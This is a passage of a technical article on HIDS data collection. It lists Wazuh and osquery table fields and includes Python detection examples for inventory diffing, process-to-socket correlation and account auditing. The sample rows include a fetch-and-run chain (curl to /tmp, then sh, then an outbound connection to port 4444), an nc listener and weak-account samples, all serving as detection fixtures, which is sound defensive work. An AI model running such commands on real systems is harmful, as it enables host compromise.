Summary of HIDS Data Collection Items

Data collection is one of the core capabilities of a HIDS: the depth of collection determines how deeply an attack chain can be observed, and the breadth of collection determines how much of the attack surface can be observed. This article summarizes the data items a HIDS collects and the techniques used to collect them...

0x01 Open-source HIDS data items

Let us first look at the data collection schemes of several open-source HIDS projects: Wazuh, Osquery and Elkeid.

  • Wazuh: an extension of OSSEC that integrates with the Elastic Stack and OpenSCAP; a relatively mature open-source HIDS solution
  • Osquery: open-sourced by Facebook for querying, monitoring and analyzing systems; its core feature is exposing operating-system data through SQL
  • Elkeid: formerly AgentSmith-HIDS, now maintained by the ByteDance security team; its distinguishing feature is custom syscall hooks that supply richer raw data from kernel space

1. Wazuh data items

The Wazuh agent collects important system information and stores it in a per-agent SQLite database on the manager. The Syscollector module is responsible for this task.

After the agent starts, Syscollector periodically scans the configured targets (hardware, operating system, packages, etc.) and forwards newly collected data to the manager. The manager updates the corresponding tables in the database, and the data can then be retrieved from the database through the Wazuh API.

a. Hardware information

| Field | Description | Example | Platforms |
|---|---|---|---|
| scan_id | Scan identifier | 573872577 | All |
| scan_time | Scan time | 2018/7/31 15:31 | All |
| board_serial | Motherboard serial number | XDR840TUGM65E03171 | All |
| cpu_name | CPU name | Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz | All |
| cpu_cores | Number of CPU cores | 4 | All |
| cpu_mhz | Current processor frequency (MHz) | 900.106 | All |
| ram_total | Total RAM (KB) | 16374572 | All |
| ram_free | Free RAM (KB) | 2111928 | All |
| ram_usage | RAM in use (%) | 87 | All |
| checksum | Integrity synchronization value | 503709147600c8e0023cf2b9995772280eee30 | All |

b. Operating system

| Field | Description | Example | Platforms |
|---|---|---|---|
| scan_id | Scan identifier | 468455719 | All |
| scan_time | Scan time | 2018/7/31 15:31 | All |
| hostname | Machine hostname | ag-ubuntu-16 | All |
| architecture | OS architecture | x86_64 | All |
| os_name | OS name | Ubuntu | All |
| os_version | OS version | 16.04.5 LTS (Xenial Xerus) | All |
| os_codename | OS codename | Xenial Xerus | All |
| os_major | Major release version | 16 | All |
| os_minor | Minor release version | 4 | All |
| os_patch | Patch release version | 5 | macOS |
| os_build | Optional build-specific version | 14393 | Windows |
| os_release | Windows release | SP2 | Windows |
| os_display_version | Windows display version | 20H2 | Windows |
| os_platform | OS platform | ubuntu | All |
| sysname | System name | Linux | Linux |
| release | Release name (kernel release) | 4.15.0-29-generic | Linux |
| version | Release version | #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 | All |
| checksum | Integrity synchronization value | 503709147600c8e0023cf2b9995772280eee30 | All |
| reference | Primary key | 94b6f7b3c1d905aae22a652448df6372da98e5b8 | All |

c. Package information

On Linux systems, the packages retrieved can be of type deb, pacman or rpm.

| Field | Description | Example | Platforms |
|---|---|---|---|
| scan_id | Scan identifier | 1454946158 | All |
| scan_time | Scan time | 2018/7/27 7:27 | All |
| format | Package format | deb | All |
| name | Package name | linux-headers-generic | All |
| priority | Package priority | optional | deb |
| section | Package section | kernel | deb/rpm/pkg |
| size | Installed package size (bytes) | 14 | deb/rpm/pacman |
| vendor | Vendor name | Ubuntu Kernel Team | All |
| install_time | Package installation date | 2018/2/8 18:45 | rpm/pacman/win |
| version | Package version | 4.4.0.130.136 | All |
| architecture | Package architecture | amd64 | All |
| multiarch | Multi-architecture support | same | deb |
| source | Package source | linux-meta | deb/rpm/pkg |
| description | Package description | Generic Linux kernel headers | deb/rpm/pacman/pkg |
| location | Package location | C:\Program Files\VMware\VMware Tools\ | win/pkg |
| checksum | Integrity synchronization value | 78503709147600c8e0023cf2b9995772280eee30 | All |
| item_id | Primary key | 4323709147600c8e0023cf2b9995772280eef451 | All |

d. Network interface information

sys_netiface table

| Field | Description | Example | Platforms |
|---|---|---|---|
| id | ID | 1 | All |
| scan_id | Scan identifier | 160615720 | All |
| scan_time | Scan time | 2018/7/31 16:46 | All |
| name | Interface name | eth0 | All |
| adapter | Physical adapter name | Intel(R) PRO/1000 MT Desktop Adapter | Windows |
| type | Network adapter type | ethernet | All |
| state | Interface state | up | All |
| mtu | Maximum transmission unit | 1500 | All |
| mac | MAC address | 08:00:27:C0:14:A5 | All |
| tx_packets | Transmitted packets | 30279 | All |
| rx_packets | Received packets | 12754 | All |
| tx_bytes | Transmitted bytes | 10034626 | All |
| rx_bytes | Received bytes | 1111175 | All |
| tx_errors | Transmit errors | 0 | All |
| rx_errors | Receive errors | 0 | All |
| tx_dropped | Dropped outgoing packets | 0 | All |
| rx_dropped | Dropped incoming packets | 0 | All |
| checksum | Integrity synchronization value | 8503709147600c8e0023cf2b9995772280eee30 | All |
| item_id | Primary key | 4323709147600c8e0023cf2b9995772280eef41 | All |

sys_netaddr table

| Field | Description | Example | Platforms |
|---|---|---|---|
| id | Reference ID from sys_netiface | 1 | All |
| scan_id | Scan identifier | 160615720 | All |
| proto | Protocol name | ipv4 | All |
| address | IPv4/IPv6 address | 192.168.1.87 | All |
| netmask | Netmask | 255.255.255.0 | All |
| broadcast | Broadcast address | 192.168.1.255 | All |
| checksum | Integrity synchronization value | 78503709147600c8e0023cf2b9995772280eee30 | All |
| item_id | Primary key | 4323709147600c8e0023cf2b9995772280eef4 | All |

sys_netproto table

| Field | Description | Example | Platforms |
|---|---|---|---|
| id | Reference ID from sys_netiface | 1 | All |
| scan_id | Scan identifier | 160615720 | All |
| iface | Interface name | eth0 | All |
| type | Interface data protocol | ipv4 | All |
| gateway | Default gateway | 192.168.1.1 | Linux/Windows/macOS |
| dhcp | DHCP status | enabled | Linux/Windows |
| checksum | Integrity synchronization value | 78503709147600c8e0023cf2b9995772280eee30 | All |
| item_id | Primary key | 4323709147600c8e0023cf2b9995772280eef4 | All |

e. Port information

| Field | Description | Example | Platforms |
|---|---|---|---|
| scan_id | Scan identifier | 1618114744 | All |
| scan_time | Scan time | 2018/7/27 7:27 | All |
| protocol | Port protocol | tcp | All |
| local_ip | Local IP address | 0.0.0.0 | All |
| local_port | Local port | 22 | All |
| remote_ip | Remote IP address | 0.0.0.0 | All |
| remote_port | Remote port | 0 | All |
| tx_queue | Packets waiting to be transmitted | 0 | Linux |
| rx_queue | Packets in the receive queue | 0 | Linux |
| inode | Socket inode | 16974 | Linux |
| state | Port state | listening | All |
| PID | PID of the process that opened the port | 4 | Windows/macOS |
| process | Process name | System | Windows/macOS |
| checksum | Integrity synchronization value | 78503709147600c8e0023cf2b9995772280eee30 | All |
| item_id | Primary key | 4323709147600c8e0023cf2b9995772280eef412 | All |

f. Process information

| Field | Description | Example | Platforms |
|---|---|---|---|
| scan_id | Scan identifier | 215303769 | All |
| scan_time | Scan time | 2018/8/3 12:57 | All |
| pid | Process PID | 603 | All |
| name | Process name | rsyslogd | All |
| state | Process state | S | Linux/macOS |
| ppid | Parent process PID | 1 | All |
| utime | Time spent executing user code | 157 | Linux |
| stime | Time spent executing kernel code | 221 | All |
| cmd | Process command line | /usr/sbin/rsyslogd | Linux/Windows |
| argvs | Command arguments | -n | Linux |
| euser | Effective user | root | Linux/macOS |
| ruser | Real user | root | Linux/macOS |
| suser | Saved-set user | root | Linux |
| egroup | Effective group | root | Linux |
| rgroup | Real group | root | Linux/macOS |
| sgroup | Saved-set group | root | Linux |
| fgroup | Filesystem group name | root | Linux |
| priority | Kernel scheduling priority | 20 | All |
| nice | Process nice value | 0 | Linux/macOS |
| size | Process size | 53030 | All |
| vm_size | Total VM size (KB) | 212120 | All |
| resident | Resident size of the process (bytes) | 902 | Linux |
| share | Shared memory | 814 | Linux |
| start_time | Process start time | 1893 | Linux |
| pgrp | Process group | 603 | Linux |
| session | Process session | 603 | All |
| nlwp | Number of lightweight processes (threads) | 3 | All |
| tgid | Thread group ID | 603 | Linux |
| tty | Process TTY number | 0 | Linux |
| processor | Processor number | 0 | Linux |
| checksum | Integrity synchronization value | 78503709147600c8e0023cf2b9995772280eee30 | All |
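The Syscollector tables above are inventory snapshots: each scan replaces the agent's previous state on the manager, so change detection (a port that started listening, a package that appeared or changed version between two scans) is left to whoever consumes the data. The following added example, which is not Wazuh code, diffs two constructed snapshots of the ports and packages tables using the field names listed above. The snapshot contents, the `BASELINE`/`CURRENT` names and the `inventory_diff` function are assumptions made for illustration; note that the table above marks the ports `PID`/`process` columns as Windows/macOS-only, so on Linux they would be empty, which is why the diff keys on the socket tuple alone.

```python
"""Diff two Wazuh Syscollector snapshots (ports + packages) into change events.

Added example, not Wazuh code. Rows are constructed to mimic the columns of the
Syscollector ports and packages tables documented above; they are not real
agent data. Each snapshot is what one scan would leave in the per-agent
database on the manager.
"""

# Constructed snapshot from an earlier scan (assumed scan_id 100).
# ports columns used: protocol, local_ip, local_port, state, pid, process
BASELINE = {
    "ports": [
        {"protocol": "tcp", "local_ip": "0.0.0.0",   "local_port": 22,    "state": "listening",   "pid": 812,  "process": "sshd"},
        {"protocol": "tcp", "local_ip": "127.0.0.1", "local_port": 3306,  "state": "listening",   "pid": 1044, "process": "mysqld"},
        {"protocol": "tcp", "local_ip": "10.0.0.5",  "local_port": 51234, "state": "established", "pid": 2231, "process": "curl"},
    ],
    "packages": [
        {"name": "openssl", "version": "1.1.1f-1ubuntu2", "format": "deb"},
        {"name": "sudo",    "version": "1.8.31-1ubuntu1", "format": "deb"},
        {"name": "nmap",    "version": "7.80+dfsg1-2",    "format": "deb"},
    ],
}

# Constructed snapshot from the next scan (assumed scan_id 101).
CURRENT = {
    "ports": [
        {"protocol": "tcp", "local_ip": "0.0.0.0",  "local_port": 22,    "state": "listening",   "pid": 812,  "process": "sshd"},
        {"protocol": "tcp", "local_ip": "0.0.0.0",  "local_port": 3306,  "state": "listening",   "pid": 1044, "process": "mysqld"},
        {"protocol": "tcp", "local_ip": "0.0.0.0",  "local_port": 4444,  "state": "listening",   "pid": 3377, "process": "nc"},
        {"protocol": "tcp", "local_ip": "10.0.0.5", "local_port": 51240, "state": "established", "pid": 2231, "process": "curl"},
    ],
    "packages": [
        {"name": "openssl", "version": "1.1.1f-1ubuntu2.20", "format": "deb"},
        {"name": "sudo",    "version": "1.8.31-1ubuntu1",    "format": "deb"},
        {"name": "socat",   "version": "1.7.3.3-2",          "format": "deb"},
    ],
}


def listening_sockets(ports):
    """Key listening sockets by (protocol, local_ip, local_port).

    Only the 'listening' state is a stable inventory fact; established
    connections churn between scans and would only produce noise.
    """
    return {
        (p["protocol"], p["local_ip"], p["local_port"]): p
        for p in ports
        if p["state"] == "listening"
    }


def inventory_diff(before, after):
    """Return change events between two snapshots.

    Event kinds: port_opened, port_closed, package_installed,
    package_removed, package_changed.
    """
    events = []

    old_ports, new_ports = listening_sockets(before["ports"]), listening_sockets(after["ports"])
    for key in sorted(new_ports.keys() - old_ports.keys()):
        p = new_ports[key]
        events.append(("port_opened", key, p["process"], p["pid"]))
    for key in sorted(old_ports.keys() - new_ports.keys()):
        p = old_ports[key]
        events.append(("port_closed", key, p["process"], p["pid"]))

    old_pkgs = {p["name"]: p["version"] for p in before["packages"]}
    new_pkgs = {p["name"]: p["version"] for p in after["packages"]}
    for name in sorted(new_pkgs.keys() - old_pkgs.keys()):
        events.append(("package_installed", name, new_pkgs[name]))
    for name in sorted(old_pkgs.keys() - new_pkgs.keys()):
        events.append(("package_removed", name, old_pkgs[name]))
    for name in sorted(old_pkgs.keys() & new_pkgs.keys()):
        if old_pkgs[name] != new_pkgs[name]:
            events.append(("package_changed", name, old_pkgs[name], new_pkgs[name]))
    return events


def wildcard_binds(events):
    """Newly opened ports bound to every interface deserve a closer look: a
    service that moved from 127.0.0.1 to 0.0.0.0 has widened the attack
    surface even though its port number did not change."""
    return [e for e in events if e[0] == "port_opened" and e[1][1] in ("0.0.0.0", "::")]


if __name__ == "__main__":
    for event in inventory_diff(BASELINE, CURRENT):
        print(event)
```

The per-row `checksum` column exists so that agent and manager can synchronize only the items that changed; the diff above works at the same granularity (one key per item) but produces the security-relevant events, which Syscollector itself does not emit.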

2. Osquery data items

a. Event tables

apparmor_events

Tracks AppArmor events

Field Type Description
type TEXT Event type
message TEXT Raw audit message
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
apparmor TEXT Apparmor Status like ALLOWED, DENIED etc.
operation TEXT Permission requested by the process
parent UNSIGNED_BIGINT Parent process PID
profile TEXT Apparmor profile name
name TEXT Process name
pid UNSIGNED_BIGINT Process ID
comm TEXT Command-line name of the command that was used to invoke the analyzed process
denied_mask TEXT Denied permissions for the process
capname TEXT Capability requested by the process
fsuid UNSIGNED_BIGINT Filesystem user ID
ouid UNSIGNED_BIGINT Object owner’s user ID
capability BIGINT Capability number
requested_mask TEXT Requested access mask
info TEXT Additional information
error TEXT Error information
namespace TEXT AppArmor namespace
label TEXT AppArmor label

bpf_process_events

Tracks time/action of process executions (eBPF publisher)

Field Type Description
tid BIGINT Thread ID
pid BIGINT Process ID
parent BIGINT Parent process ID
uid BIGINT User ID
gid BIGINT Group ID
cid INTEGER Cgroup ID
exit_code TEXT Exit code of the system call
probe_error INTEGER Set to 1 if one or more buffers could not be captured
syscall TEXT System call name
path TEXT Binary path
cwd TEXT Current working directory
cmdline TEXT Command line arguments
duration INTEGER How much time was spent inside the syscall (nsecs)
json_cmdline TEXT Command line arguments, in JSON format
ntime TEXT The nsecs uptime timestamp as obtained from BPF
time BIGINT Time of execution in UNIX time
eid INTEGER Event ID

bpf_socket_events

Tracks network socket opens and closes (eBPF publisher)

Field Type Description
tid BIGINT Thread ID
pid BIGINT Process ID
parent BIGINT Parent process ID
uid BIGINT User ID
gid BIGINT Group ID
cid INTEGER Cgroup ID
exit_code TEXT Exit code of the system call
probe_error INTEGER Set to 1 if one or more buffers could not be captured
syscall TEXT System call name
path TEXT Path of executed file
fd TEXT The file description for the process socket
family INTEGER The Internet protocol family ID
type INTEGER The socket type
protocol INTEGER The network protocol ID
local_address TEXT Local address associated with socket
remote_address TEXT Remote address associated with socket
local_port INTEGER Local network protocol port number
remote_port INTEGER Remote network protocol port number
duration INTEGER How much time was spent inside the syscall (nsecs)
ntime TEXT The nsecs uptime timestamp as obtained from BPF
time BIGINT Time of execution in UNIX time
eid INTEGER Event ID

file_events

Tracks time/action changes to files specified in the configuration

Field Type Description
target_path TEXT The path associated with the event
category TEXT The category of the file defined in the config
action TEXT Change action (UPDATE, REMOVE, etc)
transaction_id BIGINT ID used during bulk update
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
size BIGINT Size of file in bytes
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Last status change time
md5 TEXT The MD5 of the file after change
sha1 TEXT The SHA1 of the file after change
sha256 TEXT The SHA256 of the file after change
hashed INTEGER 1 if the file was hashed, 0 if not, -1 if hashing failed
time BIGINT Time of file event
eid TEXT Event ID

hardware_events

Hardware (PCI/USB/HID) events from UDEV or IOKit

Field Type Description
action TEXT Remove, insert, change properties, etc
path TEXT Local device path assigned (optional)
type TEXT Type of hardware and hardware event
driver TEXT Driver claiming the device
vendor TEXT Hardware device vendor
vendor_id TEXT Hex encoded Hardware vendor identifier
model TEXT Hardware device model
model_id TEXT Hex encoded Hardware model identifier
serial TEXT Device serial (optional)
revision TEXT Device revision (optional)
time BIGINT Time of hardware event
eid TEXT Event ID

process_events

Tracks time/action of process executions

Field Type Description
pid BIGINT Process (or thread) ID
path TEXT Path of executed file
mode TEXT File mode permissions
cmdline TEXT Command line arguments (argv)
cmdline_size BIGINT Actual size (bytes) of command line arguments
env TEXT Environment variables delimited by spaces
env_count BIGINT Number of environment variables
env_size BIGINT Actual size (bytes) of environment list
cwd TEXT The process current working directory
auid BIGINT Audit User ID at process start
uid BIGINT User ID at process start
euid BIGINT Effective user ID at process start
gid BIGINT Group ID at process start
egid BIGINT Effective group ID at process start
owner_uid BIGINT File owner user ID
owner_gid BIGINT File owner group ID
atime BIGINT File last access in UNIX time
mtime BIGINT File modification in UNIX time
ctime BIGINT File last metadata change in UNIX time
btime BIGINT File creation in UNIX time
overflows TEXT List of structures that overflowed
parent BIGINT Process parent’s PID, or -1 if cannot be determined.
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
status BIGINT OpenBSM Attribute: Status of the process
fsuid BIGINT Filesystem user ID at process start
suid BIGINT Saved user ID at process start
fsgid BIGINT Filesystem group ID at process start
sgid BIGINT Saved group ID at process start
syscall TEXT Syscall name: fork, vfork, clone, execve, execveat

process_file_events

A file integrity monitoring implementation based on the audit service

Field Type Description
operation TEXT Operation type
pid BIGINT Process ID
ppid BIGINT Parent process ID
time BIGINT Time of execution in UNIX time
executable TEXT The executable path
partial TEXT True if this is a partial event (i.e.: this process existed before we started osquery)
cwd TEXT The current working directory of the process
path TEXT The path associated with the event
dest_path TEXT The canonical path associated with the event
uid TEXT The uid of the process performing the action
gid TEXT The gid of the process performing the action
auid TEXT Audit user ID of the process using the file
euid TEXT Effective user ID of the process using the file
egid TEXT Effective group ID of the process using the file
fsuid TEXT Filesystem user ID of the process using the file
fsgid TEXT Filesystem group ID of the process using the file
suid TEXT Saved user ID of the process using the file
sgid TEXT Saved group ID of the process using the file
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

seccomp_events

A virtual table that tracks seccomp events

Field Type Description
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
auid UNSIGNED_BIGINT Audit user ID (loginuid) of the user who started the analyzed process
uid UNSIGNED_BIGINT User ID of the user who started the analyzed process
gid UNSIGNED_BIGINT Group ID of the user who started the analyzed process
ses UNSIGNED_BIGINT Session ID of the session from which the analyzed process was invoked
pid UNSIGNED_BIGINT Process ID
comm TEXT Command-line name of the command that was used to invoke the analyzed process
exe TEXT The path to the executable that was used to invoke the analyzed process
sig BIGINT Signal value sent to process by seccomp
arch TEXT Information about the CPU architecture
syscall TEXT Type of the system call
compat BIGINT Is system call in compatibility mode
ip TEXT Instruction pointer value
code TEXT The seccomp action

selinux_events

Tracks SELinux events

Field Type Description
type TEXT Event type
message TEXT Message
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

socket_events

Tracks network socket opens and closes

Field Type Description
action TEXT The socket action (bind, listen, close)
pid BIGINT Process (or thread) ID
path TEXT Path of executed file
fd TEXT The file description for the process socket
auid BIGINT Audit User ID
status TEXT Either ‘succeeded’, ‘failed’, ‘in_progress’ (connect() on non-blocking socket) or ‘no_client’ (null accept() on non-blocking socket)
family INTEGER The Internet protocol family ID
protocol INTEGER The network protocol ID
local_address TEXT Local address associated with socket
remote_address TEXT Remote address associated with socket
local_port INTEGER Local network protocol port number
remote_port INTEGER Remote network protocol port number
socket TEXT The local path (UNIX domain socket only)
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID
success INTEGER Deprecated. Use the ‘status’ column instead

syslog_events

Field Type Description
time BIGINT Current unix epoch time
datetime TEXT Time known to syslog
host TEXT Hostname configured for syslog
severity INTEGER Syslog severity
facility TEXT Syslog facility
tag TEXT The syslog tag
message TEXT The syslog message
eid TEXT Event ID

user_events

Tracks user events using the audit framework

Field Type Description
uid BIGINT User ID
auid BIGINT Audit User ID
pid BIGINT Process (or thread) ID
message TEXT Message from the event
type INTEGER Audit record type of the user event
path TEXT Supplied path from event
address TEXT The Internet protocol address or family ID
terminal TEXT Terminal from which the event originated, if any
time BIGINT Time of execution in UNIX time
uptime BIGINT Time of execution in system uptime
eid TEXT Event ID

yara_events

Tracks YARA matches for files specified in the configuration

Field Type Description
target_path TEXT The path scanned
category TEXT The category of the file
action TEXT Change action (UPDATE, REMOVE, etc)
transaction_id BIGINT ID used during bulk update
matches TEXT List of YARA matches
count INTEGER Number of YARA matches
strings TEXT Matching strings
tags TEXT Matching tags
time BIGINT Time of the scan
eid TEXT Event ID
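Because osquery exposes these event tables through SQLite, correlating them is an SQL join. The added example below (not osquery code) mirrors a subset of the `process_events` and `socket_events` columns into an in-memory SQLite database loaded with constructed audit rows, runs one detection query against it (a child of a shell that dials out to a non-web port shortly after exec), and walks the parent chain to recover the attack path. The same SELECT can be pasted into `osqueryi` on a host with the audit publisher enabled; the sample rows, the `SHELL_PATHS` allowlist and the 60-second window are assumptions.

```python
"""Correlate osquery process_events with socket_events to surface a
"shell child that dials out" chain. Added example, not osquery code.

The tables are in-memory SQLite mirrors carrying only the columns the query
needs; the rows are constructed and are not real audit output.
"""
import sqlite3

# Constructed process_events rows: pid, parent, path, cmdline, uid, euid, time
PROCESS_EVENTS = [
    (4101, 1200, "/usr/bin/curl",    "curl -s http://198.51.100.7/x.sh -o /tmp/x.sh", 1000, 1000, 1700000000),
    (4102, 4101, "/bin/sh",          "sh /tmp/x.sh",                                   1000, 1000, 1700000001),
    (4103, 4102, "/usr/bin/python3", "python3 /tmp/c.py",                               1000, 1000, 1700000002),
    (4200, 1,    "/usr/sbin/sshd",   "sshd -D",                                         0,    0,    1700000005),
    (4300, 4102, "/bin/ls",          "ls -la /tmp",                                     1000, 1000, 1700000006),
]

# Constructed socket_events rows: pid, action, family, remote_address, remote_port, time
SOCKET_EVENTS = [
    (4101, "connect", 2, "198.51.100.7", 80,   1700000000),
    (4103, "connect", 2, "198.51.100.7", 4444, 1700000003),
    (4200, "bind",    2, "0.0.0.0",      22,   1700000005),
]

# Assumed set of shell binaries whose children are of interest.
SHELL_PATHS = ("/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash")
_MARKS = ",".join("?" * len(SHELL_PATHS))

# Children of a shell that open an outbound connection within 60 s of exec to a
# port that is not plain HTTP(S). PIDs are reused by the kernel, so the socket
# event is constrained to the exec's time window instead of matched on pid alone.
SHELL_CHILD_DIALS_OUT = f"""
SELECT p.pid, p.path, p.cmdline, pp.path AS parent_path,
       s.remote_address, s.remote_port
FROM process_events p
JOIN process_events pp ON pp.pid = p.parent AND pp.time <= p.time
JOIN socket_events  s  ON s.pid = p.pid
                       AND s.action = 'connect'
                       AND s.time BETWEEN p.time AND p.time + 60
WHERE pp.path IN ({_MARKS})
  AND s.remote_port NOT IN (80, 443)
ORDER BY p.time
"""


def build_db():
    """Load the constructed rows into SQLite tables named like osquery's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE process_events (pid INTEGER, parent INTEGER, path TEXT, "
                 "cmdline TEXT, uid INTEGER, euid INTEGER, time INTEGER)")
    conn.executemany("INSERT INTO process_events VALUES (?,?,?,?,?,?,?)", PROCESS_EVENTS)
    conn.execute("CREATE TABLE socket_events (pid INTEGER, action TEXT, family INTEGER, "
                 "remote_address TEXT, remote_port INTEGER, time INTEGER)")
    conn.executemany("INSERT INTO socket_events VALUES (?,?,?,?,?,?)", SOCKET_EVENTS)
    return conn


def shell_children_dialing_out(conn):
    """Run the detection query.

    Returns rows of (pid, path, cmdline, parent_path, remote_address, remote_port).
    """
    return conn.execute(SHELL_CHILD_DIALS_OUT, SHELL_PATHS).fetchall()


def process_chain(conn, pid):
    """Walk parent links through process_events back to the oldest known ancestor.

    Returns executable paths from that ancestor down to `pid`. The visited set
    guards against cycles that pid reuse can introduce in long-lived data.
    """
    chain, seen = [], set()
    while pid not in seen:
        seen.add(pid)
        row = conn.execute(
            "SELECT parent, path FROM process_events WHERE pid = ? ORDER BY time DESC LIMIT 1",
            (pid,),
        ).fetchone()
        if row is None:
            break
        chain.append(row[1])
        pid = row[0]
    return chain[::-1]


if __name__ == "__main__":
    db = build_db()
    for hit in shell_children_dialing_out(db):
        print(hit, " -> ".join(process_chain(db, hit[0])))
```

On a real host the `time` window matters more than it looks: audit-based `process_events` and `socket_events` arrive asynchronously, and a pid can be recycled between the exec and the connect, so a join on `pid` alone will eventually attribute a connection to the wrong process.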

b. Software package information

apt_sources

APT repository and source information

Field Type Description
name TEXT Repository name
source TEXT Source file
base_uri TEXT Repository base URI
release TEXT Release name
version TEXT Repository source version
maintainer TEXT Repository maintainer
components TEXT Repository components
architectures TEXT Repository architectures
pid_with_namespace INTEGER Pids that contain a namespace

deb_packages

Database of installed DEB packages

Field Type Description
name TEXT Package name
version TEXT Package version
source TEXT Package source
size BIGINT Package size in bytes
arch TEXT Package architecture
revision TEXT Package revision
status TEXT Package status
maintainer TEXT Package maintainer
section TEXT Package section
priority TEXT Package priority
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

npm_packages

Lists all npm packages installed in a directory or globally on the system

Field Type Description
name TEXT Package display name
version TEXT Package supplied version
description TEXT Package supplied description
author TEXT Package author name
license TEXT License for package
path TEXT Module’s package.json path
directory TEXT Node module’s directory where this package is located
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

python_packages

Python packages installed on the system

Field Type Description
name TEXT Package display name
version TEXT Package-supplied version
summary TEXT Package-supplied summary
author TEXT Optional package author
license TEXT License under which package is launched
path TEXT Path at which this module resides
directory TEXT Directory where Python modules are located
pid_with_namespace INTEGER Pids that contain a namespace

rpm_package_files

Files belonging to RPM packages currently installed on the host system

Field Type Description
package TEXT RPM package name
path TEXT File path within the package
username TEXT File default username from info DB
groupname TEXT File default groupname from info DB
mode TEXT File permissions mode from info DB
size BIGINT Expected file size in bytes from RPM info DB
sha256 TEXT SHA256 file digest from RPM info DB

rpm_packages

RPM packages currently installed on the host system

Field Type Description
name TEXT RPM package name
version TEXT Package version
release TEXT Package release
source TEXT Source RPM package name (optional)
size BIGINT Package size in bytes
sha1 TEXT SHA1 hash of the package contents
arch TEXT Architecture(s) supported
epoch INTEGER Package epoch value
install_time INTEGER When the package was installed
vendor TEXT Package vendor
package_group TEXT Package group
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

yum_sources

Current Yum repository and source information

Field Type Description
name TEXT Repository name
baseurl TEXT Repository base URL
enabled TEXT Whether the repository is used
gpgcheck TEXT Whether packages are GPG checked
gpgkey TEXT URL to GPG key
pid_with_namespace INTEGER Pids that contain a namespace

c. User/group information

users

Local user accounts (including domain accounts that have logged on locally, on Windows)

Field Type Description
uid BIGINT User ID
gid BIGINT Group ID (unsigned)
uid_signed BIGINT User ID as int64 signed (Apple)
gid_signed BIGINT Default group ID as int64 signed (Apple)
username TEXT Username
description TEXT Optional user description
directory TEXT User’s home directory
shell TEXT User’s configured default shell
uuid TEXT User’s UUID (Apple) or SID (Windows)
type TEXT Whether the account is roaming (domain), local, or a system profile
is_hidden INTEGER IsHidden attribute set in OpenDirectory
pid_with_namespace INTEGER Pids that contain a namespace

user_groups

Local system user-to-group relationships

Field Type Description
uid BIGINT User ID
gid BIGINT Group ID

user_ssh_keys

Returns the private keys in users' ~/.ssh directories and whether they are encrypted

Field Type Description
uid BIGINT The local user that owns the key file
path TEXT Path to key file
encrypted INTEGER 1 if key is encrypted, 0 otherwise
key_type TEXT The type of the private key. One of [rsa, dsa, dh, ec, hmac, cmac], or the empty string.
pid_with_namespace INTEGER Pids that contain a namespace

groups

Local system groups

Field Type Description
gid BIGINT Unsigned int64 group ID
gid_signed BIGINT A signed int64 version of gid
groupname TEXT Canonical local group name
group_sid TEXT Unique group ID
comment TEXT Remarks or comments associated with the group
is_hidden INTEGER IsHidden attribute set in OpenDirectory
pid_with_namespace INTEGER Pids that contain a namespace

shadow

Local users' encrypted passwords and related information (from /etc/shadow)

Field Type Description
password_status TEXT Password status
hash_alg TEXT Password hashing algorithm
last_change BIGINT Date of last password change (starting from UNIX epoch date)
min BIGINT Minimal number of days between password changes
max BIGINT Maximum number of days between password changes
warning BIGINT Number of days before password expires to warn user about it
inactive BIGINT Number of days after password expires until account is blocked
expire BIGINT Number of days since UNIX epoch date until account is disabled
flag BIGINT Reserved
username TEXT Username

sudoers

Rules for running commands as other users via sudo

Field Type Description
source TEXT Source file containing the given rule
header TEXT Symbol for given rule
rule_details TEXT Rule definition

suid_bin

suid binaries in common locations

Field Type Description
path TEXT Binary path
username TEXT Binary owner username
groupname TEXT Binary owner group
permissions TEXT Binary permissions
pid_with_namespace INTEGER Pids that contain a namespace

shell_history

A line-delimited (command) table of each user's .*_history data

Field Type Description
uid BIGINT Shell history owner
time INTEGER Entry timestamp. It could be absent, default value is 0.
command TEXT Unparsed date/line/command history line
history_file TEXT Path to the .*_history for this user
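The user/group tables above are the raw material for an account-posture audit: a second uid 0 account, an empty password on an account with a login shell, an unencrypted private key, passwordless sudo to ALL, or a setuid binary outside the distribution baseline. The added example below (not osquery code) mirrors a subset of the `users`, `shadow`, `user_ssh_keys`, `suid_bin` and `sudoers` columns into SQLite, fills them with constructed rows, and runs the checks; the row contents, the `KNOWN_SUID` baseline and the `audit_accounts` function are assumptions. The SELECTs themselves run unchanged in `osqueryi`.

```python
"""Audit the account-related osquery tables for weak or suspicious state.

Added example, not osquery code: the tables are in-memory SQLite mirrors of a
subset of the users, shadow, user_ssh_keys, suid_bin and sudoers columns,
filled with constructed rows (no real host data).
"""
import sqlite3

# Constructed rows; column order is given in the load() calls in build_db().
USERS = [
    (0,    0,    "root",     "/root",        "/bin/bash"),
    (0,    0,    "toor",     "/root",        "/bin/bash"),
    (1000, 1000, "alice",    "/home/alice",  "/bin/bash"),
    (1001, 1001, "deploy",   "/home/deploy", "/bin/sh"),
    (33,   33,   "www-data", "/var/www",     "/usr/sbin/nologin"),
]
SHADOW = [
    ("root",     "active", "6"),
    ("toor",     "active", "6"),
    ("alice",    "active", "y"),
    ("deploy",   "empty",  ""),
    ("www-data", "locked", ""),
]
USER_SSH_KEYS = [
    (1000, "/home/alice/.ssh/id_rsa",  1, "rsa"),
    (1001, "/home/deploy/.ssh/id_rsa", 0, "rsa"),
]
SUID_BIN = [
    ("/usr/bin/sudo",   "root", "S"),
    ("/usr/bin/passwd", "root", "S"),
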